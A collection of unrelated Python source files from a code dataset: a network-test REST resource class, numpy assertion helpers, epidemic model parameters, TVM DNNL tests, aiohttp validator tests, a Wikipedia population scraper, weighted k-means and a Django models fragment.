super(DceNodeMacGroups, self).__init__(parent)
@property
def IncludeMacGroups(self):
"""
Returns
-------
- bool: If true, includes MAC groups for this Network Range.
"""
return self._get_attribute(self._SDM_ATT_MAP['IncludeMacGroups'])
@IncludeMacGroups.setter
def IncludeMacGroups(self, value):
self._set_attribute(self._SDM_ATT_MAP['IncludeMacGroups'], value)
@property
def InterGroupUnicastMacIncrement(self):
"""
Returns
-------
- str: The MAC address format of the Unicast MAC between one or more node groups.
"""
return self._get_attribute(self._SDM_ATT_MAP['InterGroupUnicastMacIncrement'])
@InterGroupUnicastMacIncrement.setter
def InterGroupUnicastMacIncrement(self, value):
self._set_attribute(self._SDM_ATT_MAP['InterGroupUnicastMacIncrement'], value)
@property
def IntraGroupUnicastMacIncrement(self):
"""
Returns
-------
- str: The MAC address format of the Unicast MAC within a node group.
"""
return self._get_attribute(self._SDM_ATT_MAP['IntraGroupUnicastMacIncrement'])
@IntraGroupUnicastMacIncrement.setter
def IntraGroupUnicastMacIncrement(self, value):
self._set_attribute(self._SDM_ATT_MAP['IntraGroupUnicastMacIncrement'], value)
@property
def MulticastAddressNodeStep(self):
"""
Returns
-------
- str: The Multicast MAC address that configures the increment across the Network Range simulated RBridges.
"""
return self._get_attribute(self._SDM_ATT_MAP['MulticastAddressNodeStep'])
@MulticastAddressNodeStep.setter
def MulticastAddressNodeStep(self, value):
self._set_attribute(self._SDM_ATT_MAP['MulticastAddressNodeStep'], value)
@property
def MulticastMacCount(self):
"""
Returns
-------
- number: The number of Multicast MAC addresses.
"""
return self._get_attribute(self._SDM_ATT_MAP['MulticastMacCount'])
@MulticastMacCount.setter
def MulticastMacCount(self, value):
self._set_attribute(self._SDM_ATT_MAP['MulticastMacCount'], value)
@property
def MulticastMacStep(self):
"""
Returns
-------
- str: The incremental value of Multicast MAC address.
"""
return self._get_attribute(self._SDM_ATT_MAP['MulticastMacStep'])
@MulticastMacStep.setter
def MulticastMacStep(self, value):
self._set_attribute(self._SDM_ATT_MAP['MulticastMacStep'], value)
@property
def NoOfUnicastScrMacsPerMulicastMac(self):
"""
Returns
-------
- number: The number of Unicast Source for each Multicast MAC address.
"""
return self._get_attribute(self._SDM_ATT_MAP['NoOfUnicastScrMacsPerMulicastMac'])
@NoOfUnicastScrMacsPerMulicastMac.setter
def NoOfUnicastScrMacsPerMulicastMac(self, value):
self._set_attribute(self._SDM_ATT_MAP['NoOfUnicastScrMacsPerMulicastMac'], value)
@property
def SourceGroupMapping(self):
"""
Returns
-------
- str(fullyMeshed | oneToOne | manualMapping): The Source Group mapping type.
"""
return self._get_attribute(self._SDM_ATT_MAP['SourceGroupMapping'])
@SourceGroupMapping.setter
def SourceGroupMapping(self, value):
self._set_attribute(self._SDM_ATT_MAP['SourceGroupMapping'], value)
@property
def StartMulticastMac(self):
"""
Returns
-------
- str: The MAC address format of the starting Multicast MAC.
"""
return self._get_attribute(self._SDM_ATT_MAP['StartMulticastMac'])
@StartMulticastMac.setter
def StartMulticastMac(self, value):
self._set_attribute(self._SDM_ATT_MAP['StartMulticastMac'], value)
@property
def StartUnicastSourceMac(self):
"""
Returns
-------
- str: The MAC address format of the starting Unicast Source MAC.
"""
return self._get_attribute(self._SDM_ATT_MAP['StartUnicastSourceMac'])
@StartUnicastSourceMac.setter
def StartUnicastSourceMac(self, value):
self._set_attribute(self._SDM_ATT_MAP['StartUnicastSourceMac'], value)
@property
def UnicastAddressNodeStep(self):
"""
Returns
-------
- str: The Unicast MAC address that configures the increment across the Network Range simulated RBridges.
"""
return self._get_attribute(self._SDM_ATT_MAP['UnicastAddressNodeStep'])
@UnicastAddressNodeStep.setter
def UnicastAddressNodeStep(self, value):
self._set_attribute(self._SDM_ATT_MAP['UnicastAddressNodeStep'], value)
@property
def VlanId(self):
"""
Returns
-------
- number: The VLAN ID of the enabled Multicast MAC Range.
"""
return self._get_attribute(self._SDM_ATT_MAP['VlanId'])
@VlanId.setter
def VlanId(self, value):
self._set_attribute(self._SDM_ATT_MAP['VlanId'], value)
def update(self, IncludeMacGroups=None, InterGroupUnicastMacIncrement=None, IntraGroupUnicastMacIncrement=None, MulticastAddressNodeStep=None, MulticastMacCount=None, MulticastMacStep=None, NoOfUnicastScrMacsPerMulicastMac=None, SourceGroupMapping=None, StartMulticastMac=None, StartUnicastSourceMac=None, UnicastAddressNodeStep=None, VlanId=None):
"""Updates dceNodeMacGroups resource on the server.
Args
----
- IncludeMacGroups (bool): If true, includes MAC groups for this Network Range.
- InterGroupUnicastMacIncrement (str): The MAC address format of the Unicast MAC between one or more node groups.
- IntraGroupUnicastMacIncrement (str): The MAC address format of the Unicast MAC within a node group.
- MulticastAddressNodeStep (str): The Multicast MAC address that configures the increment across the Network Range simulated RBridges.
- MulticastMacCount (number): The number of Multicast MAC addresses.
- MulticastMacStep (str): The incremental value of Multicast MAC address.
- NoOfUnicastScrMacsPerMulicastMac (number): The number of Unicast Source for each Multicast MAC address.
- SourceGroupMapping (str(fullyMeshed | oneToOne | manualMapping)): The Source Group mapping type.
- StartMulticastMac (str): The MAC address format of the starting Multicast MAC.
- StartUnicastSourceMac (str): The MAC address format of the starting Unicast Source MAC.
- UnicastAddressNodeStep (str): The Unicast MAC address that configures the increment across the Network Range simulated RBridges.
- VlanId (number): The VLAN ID of the enabled Multicast MAC Range.
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))
def add(self, IncludeMacGroups=None, InterGroupUnicastMacIncrement=None, IntraGroupUnicastMacIncrement=None, MulticastAddressNodeStep=None, MulticastMacCount=None, MulticastMacStep=None, NoOfUnicastScrMacsPerMulicastMac=None, SourceGroupMapping=None, StartMulticastMac=None, StartUnicastSourceMac=None, UnicastAddressNodeStep=None, VlanId=None):
"""Adds a new dceNodeMacGroups resource on the server and adds it to the container.
Args
----
- IncludeMacGroups (bool): If true, includes MAC groups for this Network Range.
- InterGroupUnicastMacIncrement (str): The MAC address format of the Unicast MAC between one or more node groups.
- IntraGroupUnicastMacIncrement (str): The MAC address format of the Unicast MAC within a node group.
- MulticastAddressNodeStep (str): The Multicast MAC address that configures the increment across the Network Range simulated RBridges.
- MulticastMacCount (number): The number of Multicast MAC addresses.
- MulticastMacStep (str): The incremental value of Multicast MAC address.
- NoOfUnicastScrMacsPerMulicastMac (number): The number of Unicast Source for each Multicast MAC address.
- SourceGroupMapping (str(fullyMeshed | oneToOne | manualMapping)): The Source Group mapping type.
- StartMulticastMac (str): The MAC address format of the starting Multicast MAC.
- StartUnicastSourceMac (str): The MAC address format of the starting Unicast Source MAC.
- UnicastAddressNodeStep (str): The Unicast MAC address that configures the increment across the Network Range simulated RBridges.
- VlanId (number): The VLAN ID of the enabled Multicast MAC Range.
Returns
-------
- self: This instance with all currently retrieved dceNodeMacGroups resources using find and the newly added dceNodeMacGroups resources available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._create(self._map_locals(self._SDM_ATT_MAP, locals()))
def remove(self):
"""Deletes all the contained dceNodeMacGroups resources in this instance from the server.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
self._delete()
def find(self, IncludeMacGroups=None, InterGroupUnicastMacIncrement=None, IntraGroupUnicastMacIncrement=None, MulticastAddressNodeStep=None, MulticastMacCount=None, MulticastMacStep=None, NoOfUnicastScrMacsPerMulicastMac=None, SourceGroupMapping=None, StartMulticastMac=None, StartUnicastSourceMac=None, UnicastAddressNodeStep=None, VlanId=None):
"""Finds and retrieves dceNodeMacGroups resources from the server.
All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve dceNodeMacGroups resources from the server.
To retrieve an exact match ensure the parameter value starts with ^ and ends with $
By default the find method takes no parameters and will retrieve all dceNodeMacGroups resources from the server.
Args
----
- IncludeMacGroups (bool): If true, includes MAC groups for this Network Range.
- InterGroupUnicastMacIncrement (str): The MAC address format of the Unicast MAC between one or more node groups.
- IntraGroupUnicastMacIncrement (str): The MAC address format of the Unicast MAC within a node group.
- MulticastAddressNodeStep (str): The Multicast MAC address that configures the increment across the Network Range simulated RBridges.
- MulticastMacCount (number): The number of Multicast MAC addresses.
- MulticastMacStep (str): The incremental value of Multicast MAC address.
- NoOfUnicastScrMacsPerMulicastMac (number): The number of Unicast Source for each Multicast MAC address.
- SourceGroupMapping (str(fullyMeshed | oneToOne | manualMapping)): The Source Group mapping type.
- StartMulticastMac (str): The MAC address format of the starting Multicast MAC.
- StartUnicastSourceMac (str): The MAC address format of the starting Unicast Source MAC.
- UnicastAddressNodeStep (str): The Unicast MAC address that configures the increment across the Network Range simulated RBridges.
- VlanId (number): The VLAN ID of the enabled Multicast MAC Range.
Returns
-------
- self: This instance with matching dceNodeMacGroups resources retrieved from the server available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
def read(self, href):
"""Retrieves a single instance of dceNodeMacGroups data from the server.
Args
----
- href (str): An href to the instance to be retrieved
Returns
-------
- self: This instance with the dceNodeMacGroups resources from the server available through an iterator or index
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
| StarcoderdataPython |
1653864 | <gh_stars>1-10
from six import raise_from
import numpy as np
def assert_close(a, b, atol=1.e-8):
try:
assert np.allclose([a], [b], atol=atol)
except AssertionError as e:
raise_from(AssertionError('expected %s to be close to %s (atol=%s)' % (a, b, atol)), e)
def assert_all_close(a, b, atol=1.e-8):
try:
assert np.allclose(a, b, atol=atol)
except AssertionError as e:
raise_from(AssertionError('expected %s to be close to %s (atol=%s)' % (a, b, atol)), e)
def assert_all_not_close(a, b, atol=1.e-8):
try:
assert not np.allclose(a, b, atol=atol)
except AssertionError as e:
raise_from(AssertionError('expected %s not to be close to %s (atol=%s)' % (a, b, atol)), e)
| StarcoderdataPython |
3336752 | '''Defines the parameters we will use in the model'''
from numpy import array, arange, concatenate, diag, linspace, ones, where, zeros
from pandas import read_excel, read_csv
from scipy.integrate import solve_ivp
from model.preprocessing import (
make_aggregator, aggregate_contact_matrix,
aggregate_vector_quantities)
from model.common import sparse, hh_ODE_rates
k_home = read_excel(
'inputs/MUestimates_home_2.xlsx',
sheet_name='United Kingdom of Great Britain',
header=None).to_numpy()
k_all = read_excel(
'inputs/MUestimates_all_locations_2.xlsx',
sheet_name='United Kingdom of Great Britain',
header=None).to_numpy()
# Because we want 80 to be included as well.
fine_bds = arange(0, 81, 5)
coarse_bds = concatenate((fine_bds[:6], fine_bds[12:]))
pop_pyramid = read_csv(
'inputs/United Kingdom-2019.csv', index_col=0)
pop_pyramid = (pop_pyramid['F'] + pop_pyramid['M']).to_numpy()
k_home = aggregate_contact_matrix(k_home, fine_bds, coarse_bds, pop_pyramid)
k_all= aggregate_contact_matrix(k_all, fine_bds, coarse_bds, pop_pyramid)
k_ext = k_all - k_home
# This is in ten year blocks
rho = read_csv(
'inputs/rho_estimate_cdc.csv', header=None).to_numpy().flatten()
cdc_bds = arange(0, 81, 10)
aggregator = make_aggregator(cdc_bds, fine_bds)
# This is in five year blocks
rho = sparse(
(rho[aggregator], (arange(len(aggregator)), [0]*len(aggregator))))
gamma = 1.0/2.0
R0 = 2.4
rho = gamma * R0 * aggregate_vector_quantities(
rho, fine_bds, coarse_bds, pop_pyramid).toarray().squeeze()
det = (0.9/max(rho)) * rho
params = {'R0' : R0,
'gamma' : gamma,
'alpha' : 1.0/5.0,
'det' : det,
'sigma' : rho / det,
'tau' : 0.0 * ones(len(rho)),
'k_home' : k_home,
'k_ext' : k_ext,
'coarse_bds' : coarse_bds
}
| StarcoderdataPython |
176047 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import numpy as np
import pytest
import itertools
import tvm
import tvm.relay.testing
from tvm import relay
from tvm.relay.op.contrib import dnnl
import tvm.testing
has_dnnl_codegen = pytest.mark.skipif(
not tvm.get_global_func("relay.ext.dnnl", True), reason="DNNL codegen not available"
)
run_module = tvm.testing.parameter(
pytest.param(False, marks=[has_dnnl_codegen, *tvm.testing.requires_llvm()]),
pytest.param(True, marks=[has_dnnl_codegen, *tvm.testing.requires_llvm()]),
ids=["compile", "run"],
)
def vmobj_to_list(o):
if isinstance(o, tvm.nd.NDArray):
return [o.numpy()]
elif isinstance(o, tvm.runtime.container.ADT) or isinstance(o, list):
return [vmobj_to_list(f) for f in o]
else:
raise RuntimeError("Unknown object type: %s" % type(o))
def assert_result_dict_holds(result_dict):
for k1, k2 in itertools.combinations(result_dict, 2):
res1 = vmobj_to_list(result_dict[k1])
res2 = vmobj_to_list(result_dict[k2])
for r1, r2 in zip(res1, res2):
tvm.testing.assert_allclose(r1, r2, rtol=1e-3, atol=1e-3)
def run_and_verify(mod, input, params, target, run_module):
def check_dnnl_used(mod):
num_dnnl_subgraphs = sum(
[1 if "dnnl" in gv.name_hint else 0 for gv in mod.get_global_vars()]
)
assert num_dnnl_subgraphs >= 1
dev = tvm.cpu()
result_dict = dict()
for mode in ["graph", "vm"]:
for use_dnnl in [False, True]:
result_key = mode + ("_dnnl" if use_dnnl else "")
if use_dnnl:
mod = dnnl.partition_for_dnnl(mod, params)
with tvm.transform.PassContext(opt_level=3):
func = relay.create_executor(mode, mod=mod, device=dev, target=target).evaluate()
if run_module:
if isinstance(input, dict):
result_dict[result_key] = func(**input, **params)
else:
result_dict[result_key] = func(input, **params)
if run_module:
assert_result_dict_holds(result_dict)
def run_and_verify_func(config, run_module, target="llvm", dtype="float32"):
"""Test a Relay func by compiling, running, and comparing TVM and DNNL outputs.
Parameters
----------
config : Tuple[relay.Function, Dict[str, NDArray], List[str]]
A tuple containing 1) The function to test, 2) A dictionary of var names to input shapes and
3) A list of which vars should be considered params.
run_module: bool
If True, the built module will be run after being compiled.
"""
f, input_shapes, is_param = config
params = {x: np.random.uniform(-1, 1, input_shapes[x]).astype(dtype) for x in is_param}
input_dict = {
k: np.random.uniform(-1, 1, v).astype(dtype)
for k, v in input_shapes.items()
if k not in is_param
}
run_and_verify(f, input_dict, params, target, run_module)
def get_conv2d(
x_shape=(1, 32, 8, 8),
k_shape=(16, 32, 3, 3),
groups=1,
padding=(0, 0),
strides=(1, 1),
dilation=(1, 1),
activation=None,
dtype="float32",
):
x = relay.var("x", shape=(x_shape), dtype=dtype)
kernel = relay.var("kernel", shape=(k_shape), dtype=dtype)
out = relay.nn.conv2d(
x,
kernel,
kernel_size=k_shape[2:4],
groups=groups,
padding=padding,
strides=strides,
dilation=dilation,
channels=k_shape[0],
)
dic = {"x": x_shape, "kernel": k_shape}
param_lst = ["kernel"]
if activation == "relu":
return relay.nn.relu(out), dic, param_lst
elif activation == "tanh":
return relay.tanh(out), dic, param_lst
elif activation == "sigmoid":
return relay.sigmoid(out), dic, param_lst
else:
return out, dic, param_lst
def get_conv2d_weights_const(
x_shape=(1, 32, 8, 8),
k_shape=(16, 32, 3, 3),
groups=1,
padding=(0, 0),
strides=(1, 1),
dilation=(1, 1),
dtype="float32",
):
x = relay.var("x", shape=(x_shape), dtype=dtype)
kernel = relay.const(np.ones(k_shape).astype(dtype))
out = relay.nn.conv2d(
x,
kernel,
channels=k_shape[0],
kernel_size=k_shape[2:4],
groups=groups,
padding=padding,
strides=strides,
dilation=dilation,
)
dic = {"x": x_shape}
param_lst = []
return out, dic, param_lst
def get_conv2d_bias(
x_shape=(1, 32, 8, 8), k_shape=(16, 32, 3, 3), activation=None, dtype="float32"
):
conv, dic, param_lst = get_conv2d(x_shape=x_shape, k_shape=k_shape, dtype=dtype)
bias = relay.var("bias", shape=(k_shape[0],), dtype=dtype)
out = relay.nn.bias_add(conv, bias)
dic["bias"] = (k_shape[0],)
param_lst += ["bias"]
if activation == "relu":
return relay.nn.relu(out), dic, param_lst
elif activation == "tanh":
return relay.tanh(out), dic, param_lst
elif activation == "sigmoid":
return relay.sigmoid(out), dic, param_lst
else:
return out, dic, param_lst
def get_conv2d_bias_bn_relu(x_shape=(1, 32, 8, 8), k_shape=(16, 32, 3, 3), dtype="float32"):
conv2d_bias, dic, param_lst = get_conv2d_bias(x_shape, k_shape, dtype=dtype)
beta = relay.const(np.zeros(k_shape[0]).astype(dtype))
gamma = relay.const(np.ones(k_shape[0]).astype(dtype))
moving_mean = relay.const(np.zeros(k_shape[0]).astype(dtype))
moving_var = relay.const(np.ones(k_shape[0]).astype(dtype))
conv2d_bias_bn, _, _ = relay.nn.batch_norm(
conv2d_bias,
gamma=gamma,
beta=beta,
moving_mean=moving_mean,
moving_var=moving_var,
axis=1,
center=True,
scale=True,
epsilon=1e-5,
)
return relay.nn.relu(conv2d_bias_bn), dic, param_lst
def get_dense(x_shape=(1, 16), k_shape=(32, 16), activation=None, dtype="float32"):
x = relay.var("x", shape=(x_shape), dtype=dtype)
kernel = relay.var("kernel", shape=(k_shape), dtype=dtype)
out = relay.nn.dense(x, kernel, units=k_shape[0])
dic = {"x": x_shape, "kernel": k_shape}
param_lst = ["kernel"]
return out, dic, param_lst
def get_dense_bias(x_shape=(1, 16), k_shape=(32, 16), activation=None, dtype="float32"):
dense, dic, param_lst = get_dense(x_shape=x_shape, k_shape=k_shape, dtype=dtype)
bias = relay.var("bias", shape=(k_shape[0],), dtype=dtype)
out = relay.nn.bias_add(dense, bias)
dic["bias"] = (k_shape[0],)
param_lst += ["bias"]
return out, dic, param_lst
def test_dnnl_not_compatible(run_module, target="llvm", dtype="float32"):
xshape = (1, 32, 14, 14)
x_data = np.random.uniform(-1, 1, xshape).astype(dtype)
x = relay.var("x", shape=(xshape), dtype=dtype)
y = relay.add(x, x)
z = relay.cast(relay.cast(y, "int32"), "float32")
out = relay.nn.relu(z)
f = relay.Function([x], out)
mod = tvm.IRModule()
mod["main"] = f
mod = dnnl.partition_for_dnnl(mod)
for mode in ["graph", "vm"]:
with tvm.transform.PassContext(opt_level=3):
func = relay.create_executor(mode, mod=mod, device=tvm.cpu(0), target=target).evaluate()
if run_module:
results = func(x_data)
def test_multiple_outputs(run_module, dtype="float32"):
def get_graph():
x = relay.var("x", shape=(1, 3), dtype=dtype)
y = relay.var("y", shape=(1, 3), dtype=dtype)
z = relay.add(x, y)
w = relay.add(z, y)
out = relay.Tuple((z, w))
f = tvm.IRModule.from_expr(out)
return f, {"x": (1, 3), "y": (1, 3)}, []
run_and_verify_func(get_graph(), run_module=run_module, dtype=dtype)
def test_unary(run_module):
def get_graph(op, x_shape=(1, 8, 3, 3)):
x = relay.var("x", shape=(x_shape), dtype="float32")
out = op(x)
f = tvm.IRModule.from_expr(out)
return f, {"x": x_shape}, []
for op in [
relay.nn.relu,
relay.tanh,
relay.sigmoid,
]:
run_and_verify_func(get_graph(op), run_module=run_module)
def test_conv2d(run_module, dtype="float32"):
x_shape = (1, 32, 8, 8)
for k_shape, groups in [((16, 32, 3, 3), 1), ((32, 1, 3, 3), 32)]:
for padding in [(0, 0), (1, 1)]:
for strides in [(1, 1), (2, 2)]:
for dilation in [(1, 1), (2, 2)]:
conv2d, dic, param_lst = get_conv2d(
x_shape=x_shape,
k_shape=k_shape,
groups=groups,
padding=padding,
strides=strides,
dilation=dilation,
dtype=dtype,
)
conv2d = tvm.IRModule.from_expr(conv2d)
config = conv2d, dic, param_lst
run_and_verify_func(config, run_module=run_module, dtype=dtype)
def test_conv2d_weights_const(run_module, dtype="float32"):
x_shape = (1, 32, 8, 8)
k_shape = (16, 32, 3, 3)
conv2d, dic, param_lst = get_conv2d_weights_const(x_shape, k_shape, dtype=dtype)
conv2d = tvm.IRModule.from_expr(conv2d)
config = conv2d, dic, param_lst
run_and_verify_func(config, run_module=run_module, dtype=dtype)
def test_conv2d_pattern(run_module, dtype="float32"):
x_shape = (1, 32, 8, 8)
k_shape = (16, 32, 3, 3)
activation_lst = [None, "relu", "tanh", "sigmoid"]
for a in activation_lst:
conv2d, dic, param_lst = get_conv2d(x_shape, k_shape, activation=a, dtype=dtype)
conv2d = tvm.IRModule.from_expr(conv2d)
config = conv2d, dic, param_lst
run_and_verify_func(config, run_module=run_module, dtype=dtype)
conv2d_bias, dic, param_lst = get_conv2d_bias(x_shape, k_shape, activation=a, dtype=dtype)
conv2d_bias = tvm.IRModule.from_expr(conv2d_bias)
config = conv2d_bias, dic, param_lst
run_and_verify_func(config, run_module=run_module, dtype=dtype)
conv2d_bias_bn_relu, dic, param_lst = get_conv2d_bias_bn_relu(x_shape, k_shape, dtype=dtype)
conv2d_bias_bn_relu = tvm.IRModule.from_expr(conv2d_bias_bn_relu)
config = conv2d_bias_bn_relu, dic, param_lst
run_and_verify_func(config, run_module=run_module, dtype=dtype)
def test_dense(run_module, dtype="float32"):
x_shape = (1, 16)
k_shape = (32, 16)
dense, dic, param_lst = get_dense(x_shape, k_shape, dtype=dtype)
dense = tvm.IRModule.from_expr(dense)
config = dense, dic, param_lst
run_and_verify_func(config, run_module=run_module, dtype=dtype)
dense, dic, param_lst = get_dense(x_shape, k_shape=(1, 16), dtype=dtype)
dense = tvm.IRModule.from_expr(dense)
config = dense, dic, param_lst
run_and_verify_func(config, run_module=run_module, dtype=dtype)
def test_dense_pattern(run_module, dtype="float32"):
x_shape = (1, 16)
k_shape = (32, 16)
dense, dic, param_lst = get_dense(x_shape, k_shape, dtype=dtype)
dense = tvm.IRModule.from_expr(dense)
config = dense, dic, param_lst
run_and_verify_func(config, run_module=run_module, dtype=dtype)
dense_bias, dic, param_lst = get_dense_bias(x_shape, k_shape, dtype=dtype)
dense_bias = tvm.IRModule.from_expr(dense_bias)
config = dense_bias, dic, param_lst
run_and_verify_func(config, run_module=run_module, dtype=dtype)
if __name__ == "__main__":
import sys
sys.exit(pytest.main([__file__] + sys.argv[1:]))
| StarcoderdataPython |
93792 | def solution(A,B,K):
count = 0
for i in range(A,B):
if(i%K==0):
count += 1
#print(count)
return count
solution(6,11,2) | StarcoderdataPython |
1751444 | import asyncio
import json
import pytest
from aiohttp import web
from aiovalidator import (
IntegerField,
middleware_exception,
validator_factory,
abort)
@asyncio.coroutine
def foo_validator_async(value):
return value * 2
def foo_default_async(value):
@asyncio.coroutine
def default():
return value * 2
return default
def foo_default(value):
def default():
return value * 2
return default
class ViewTest(web.View):
class Field:
user_id = IntegerField()
field1 = IntegerField(methods={'GET', 'POST'},
validator=foo_validator_async)
field1_async = IntegerField(validator=(lambda x: x * 2))
field2 = IntegerField(default=foo_default_async(6), methods={'GET'})
field2_async = IntegerField(default=foo_default(6))
field4 = IntegerField(default=123)
@asyncio.coroutine
def get(self):
return web.json_response(self.request['fields'])
@asyncio.coroutine
def post(self):
return web.json_response(self.request['fields'])
@asyncio.coroutine
def put(self):
return web.json_response(self.request['fields'].user_id)
class ViewTestSkip(web.View):
skip_validate = True
class Field:
user_id = IntegerField(default=0)
@asyncio.coroutine
def get(self):
return web.json_response(None)
class ViewTestNotField(web.View):
@asyncio.coroutine
def get(self):
return web.json_response(None)
class ViewTestAbort(web.View):
@asyncio.coroutine
def get(self):
raise abort(status=406, text='error')
@pytest.fixture
def cli(loop, test_client):
app = web.Application(loop=loop,
middlewares=[validator_factory(),
middleware_exception])
app.router.add_route('*', '/skip', ViewTestSkip)
app.router.add_route('*', '/not_field', ViewTestNotField)
app.router.add_route('*', '/abort', ViewTestAbort)
app.router.add_route('*', '/{user_id}', ViewTest)
return loop.run_until_complete(test_client(app))
@asyncio.coroutine
def test_client_field(cli):
resp = yield from cli.get('/123?field1=6&field1_async=6')
assert (yield from resp.json()) == {
'user_id': 123,
'field1': 12,
'field1_async': 12,
'field2': 12,
'field2_async': 12,
'field4': 123,
}
@asyncio.coroutine
def test_client_field_post(cli):
data = {
'field1_async': 2,
'field4': 5
}
resp = yield from cli.post('/123?field1=6', data=json.dumps(data))
assert (yield from resp.json()) == {
'user_id': 123,
'field1': 12,
'field1_async': 4,
'field2_async': 12,
'field4': 5,
}
@asyncio.coroutine
def test_client_field_put(cli):
resp = yield from cli.put('/123?field1=6&field1_async=6')
assert (yield from resp.json()) == 123
@asyncio.coroutine
def test_client_field_skip(cli):
resp = yield from cli.get('/skip')
assert (yield from resp.json()) is None
@asyncio.coroutine
def test_client_field_not_field(cli):
resp = yield from cli.get('/not_field')
assert (yield from resp.json()) is None
@asyncio.coroutine
def test_client_field_required(cli):
resp = yield from cli.get('/123')
assert (yield from resp.json()) == {'message': 'Field field1 required'}
resp = yield from cli.get('/123?field1=123')
assert (yield from resp.json()) == {
'message': 'Field field1_async required'}
@asyncio.coroutine
def test_client_field_abort(cli):
resp = yield from cli.get('/abort')
assert (yield from resp.json()) == {'message': 'error'}
| StarcoderdataPython |
125315 | from countryinfo import countries
import json
from urllib.parse import quote,unquote
import requests
from time import sleep
from bs4 import BeautifulSoup
import re
def recode_countryinfo():
"""some entres are utf-encoded - to clean that you can use this code...
Result is stored in data.json, so you can copy data to countryinfo.py file"""
res = []
for country in countries:
c = {
'name': unquote(country['name']),
'code': country['code'],
'capital': unquote(country['capital']),
'continent': country['continent'],
'timezones': country['timezones']
}
res.append(c)
with open('data.json', 'w', encoding='utf-8') as outfile:
json.dump(res, outfile, ensure_ascii=False, indent=4)
def read_countries_from_wikipedia():
"""Read pages from wiki, and store locally. Yes Wikipedia is against crowling, but here amount is small, and storing
data helps limit load at Wikipedia side + sleep added"""
for country in countries:
# if not country['name'] in ('Macedonia'):
# print("-><- ")
# continue
if country['name'] == 'Macedonia':
country_name = quote('North Macedonia')
elif country['name'] == 'Palestine':
country_name = quote('State of Palestine')
else:
country_name = quote(country['name'])
url = f"https://en.wikipedia.org/wiki/{country_name}"
print(f"{country['name']} -> {url}")
buf = requests.get(url)
refers_re = re.compile(country['name'] + r".*usually refers to:", re.IGNORECASE)
if refers_re.search(buf.text):
# ie for Georgia
url = f"https://en.wikipedia.org/wiki/{country_name}_(country)"
print(f"{country['name']} --> {url}")
buf = requests.get(url)
if "Wikipedia does not have an article with this exact name" in buf.text:
raise Exception(f"failed to fetch {country['name']} -> {url}")
with open(f"wiki-countries/{country['name']}.html", 'w', encoding='utf-8') as outfile:
outfile.write(buf.text)
sleep(3)
def load_data_from_wiki_files_to_countryinfo():
"""read stored files, and update countryinfo with population, and other demographic data"""
for country in countries:
print(f"{country['name']}")
# country_name = quote(country['name'])
# if not country['name'] in ('Macedonia'):
# print("-><- ")
# continue
with open(f"wiki-countries/{country['name']}.html", 'r', encoding='utf-8') as infile:
content = "\n".join(infile.readlines())
soup = BeautifulSoup(content, 'html.parser')
population = read_population(soup)
print(f"population: {population}")
country['population'] = population
with open('data.json', 'w', encoding='utf-8') as outfile:
json.dump(countries, outfile, ensure_ascii=False, indent=4)
def read_population(soup):
"""read population from provided content"""
result = soup.find('a', string='Population')
if result is None:
result = soup.find('th', string='Population')
if result is None:
return None
if result.nextSibling is not None and result.nextSibling.__dict__.get('name', '') == 'td':
result = result.nextSibling.text
else:
try:
result = result.parent.nextSibling
result = result.find('td').text
except AttributeError:
return None
else:
result = result.parent.parent.nextSibling
result = result.find('td').text
num_re = re.compile(r"[0-9 \,]+", re.IGNORECASE)
match = num_re.search(result)
if match:
num = match.group(0)
else:
return None
return int(num.replace(",", ""))
#
#
# def read_gdp(soup):
# """Read GDP per capita for provided coutry"""
# result = soup.find('a', string='GDP')
# if result is None:
# result = soup.find('th', string='GDP')
# if result is None:
# return None
# if result.nextSibling is not None and result.nextSibling.__dict__.get('name', '') == 'td':
# result = result.nextSibling.text
# else:
# result = result.parent.nextSibling
# result = result.find('td').text
# else:
# result = result.parent.parent.nextSibling
# result = result.find('td').text
# num_re = re.compile(r"[0-9 \,]+", re.IGNORECASE)
# match = num_re.search(result)
# if match:
# num = match.group(0)
# else:
# return None
# return int(num.replace(",", ""))
if __name__ == "__main__":
#read_countries_from_wikipedia()
load_data_from_wiki_files_to_countryinfo()
| StarcoderdataPython |
45213 | # Based on: https://towardsdatascience.com/clustering-the-us-population-observation-weighted-k-means-f4d58b370002
import random
import numpy as np
import scipy.spatial
def distance(p1,p2):
return np.linalg.norm(p1,p2)
def cluster_centroids(data,weights, clusters, k):
results=[]
for i in range(k):
results.append( np.average(data[clusters == i],weights=weights[clusters == i],axis=0))
return np.array(results)
def kmeans(data,weights, k, steps=20):
if(np.shape(data)[0] != np.shape(weights)[0]):
print "Dimension data and weights don't match"
# Forgy initialization method: choose k data points randomly.
centroids = data[np.random.choice(np.arange(len(data)), k, False)]
for _ in range(max(steps, 1)):
sqdists = scipy.spatial.distance.cdist(centroids, data, 'euclidean')
# Index of the closest centroid to each data point.
clusters = np.argmin(sqdists, axis=0)
new_centroids = cluster_centroids(data,weights, clusters, k)
if np.array_equal(new_centroids, centroids):
break
centroids = new_centroids
return clusters, centroids
| StarcoderdataPython |
25873 | <filename>score/models.py<gh_stars>1-10
from django.db import models
from django.contrib.auth.models import User
from solo.models import SingletonModel
class Division(models.Model):
nom = models.CharField(max_length=30)
def __str__(self):
return self.nom
class Equipe(models.Model):
nom = models.CharField(max_length=100)
division = models.ForeignKey(
Division,
verbose_name='Division'
)
def __str__(self):
return '{} ({})'.format(self.nom, self.division)
class Rencontre(models.Model):
numero = models.IntegerField()
date = models.DateField()
heure = models.TimeField()
equipeDom = models.ForeignKey(
Equipe,
related_name='rencontreDom',
verbose_name='Equipe Domicile'
